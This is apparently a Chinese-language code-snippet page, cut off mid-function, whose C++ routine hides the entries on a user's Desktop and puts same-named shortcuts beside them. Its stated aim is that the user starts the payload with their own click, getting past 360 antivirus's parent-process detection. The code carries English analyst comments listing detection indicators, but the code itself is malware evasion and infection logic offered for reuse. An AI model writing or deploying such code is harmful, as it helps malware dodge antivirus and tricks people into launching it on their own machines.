利用快捷方式,由用户自己启动程序,从而绕过360的父进程查杀。代码记录于此,方便查阅。
// Top-level driver of the shortcut-replacement routine this page describes.
// It resolves the current user's Desktop path and then runs three helpers in
// order: if_need_infection, set_hide_directory, create_link. The first helper
// that returns 0 ends the routine early.
//
// Returns: 0 on every path, so a caller cannot tell success from an early exit.
//
// NOTE(review): set_hide_directory and create_link are not visible in this
// part of the file; what they do is taken from their names and the original
// inline comments only, so confirm against their implementations.
//
// Analyst notes:
//  - Each early exit emits a fixed ASCII string through OutputDebugStringA.
//    These literals are present in the binary and appear in debug output, so
//    they can serve as static and runtime indicators for this sample.
//  - Judging by the helper names and comments, the on-disk effects would be
//    Desktop entries gaining the hidden attribute and same-named shortcut
//    files appearing beside them; hunting for that pair is a reasonable
//    starting point (TODO confirm against the helpers).
//  - Per the page's description, the payload is meant to be started by the
//    user's own click, so a parent-process check alone will not flag it;
//    inspecting what the shortcuts point to is the more reliable check.
int bypass_360_startup()
{
// Receives the Desktop path; filled in by SHGetPathFromIDList below.
TCHAR str_desktop[256];
LPITEMIDLIST pidl;
// Resolve the Desktop folder (CSIDL_DESKTOP) to an item-ID list, then to a path.
// Neither call's return value is checked here.
SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl);//place the shortcut on the desktop
SHGetPathFromIDList(pidl, str_desktop);
if (if_need_infection(str_desktop)==0)//does the Desktop still need to be processed?
{
OutputDebugStringA("bypass_360_startup if_need_infection return");
return 0;
}
if (set_hide_directory(str_desktop)==0)//set the hidden attribute on the directory
{
OutputDebugStringA("bypass_360_startup set_hide_directory return");
return 0;
}
if (create_link(str_desktop)==0)//create shortcuts with the same names
{
OutputDebugStringA("bypass_360_startup create_link return");
return 0;
}
return 0;
}
int if_need_infection(TCHAR str_disk[])
{
OutputDebugStringA("if_need_infection fun:");
CSearchFile file;
file.SearchFile(_T("."),str_disk);
for (DWORD i=0;i<fil